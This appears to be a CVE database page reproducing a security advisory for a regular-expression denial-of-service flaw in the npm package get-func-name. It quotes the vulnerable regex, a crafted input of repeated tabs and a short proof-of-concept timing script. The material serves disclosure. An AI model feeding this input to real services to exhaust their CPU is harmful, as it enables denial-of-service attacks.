GHSA-4q6p-r6v2-jvc5

    Dashboard / Vulnerabilities / GHSA-4q6p-r6v2-jvc5

    GHSA-4q6p-r6v2-jvc5

    Published: 27 Sept 2023Last Modified: 7 Aug 2026

    Summary: Chaijs/get-func-name vulnerable to ReDoS

    Details: The current regex implementation for parsing values in the module is susceptible to excessive backtracking, leading to potential DoS attacks. The regex implementation in question is as follows: ```js const functionNameMatch = /\s*function(?:\s|\s*\/\*[^(?:*/)]+\*\/\s*)*([^\s(/]+)/; ``` This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input: ```js '\t'.repeat(54773) + '\t/function/i' ``` Here is a simple PoC code to demonstrate the issue: ```js const protocolre = /\sfunction(?:\s|\s/*[^(?:*\/)]+*/\s*)*([^\(\/]+)/; const startTime = Date.now(); const maliciousInput = '\t'.repeat(54773) + '\t/function/i' protocolre.test(maliciousInput); const endTime = Date.now(); console.log("process time: ", endTime - startTime, "ms"); ```

    Affected packages

    Package

    Name: get-func-name

    Purl: pkg:npm/get-func-name

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -2.0.1

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-4q6p-r6v2-jvc5 | CVE-DB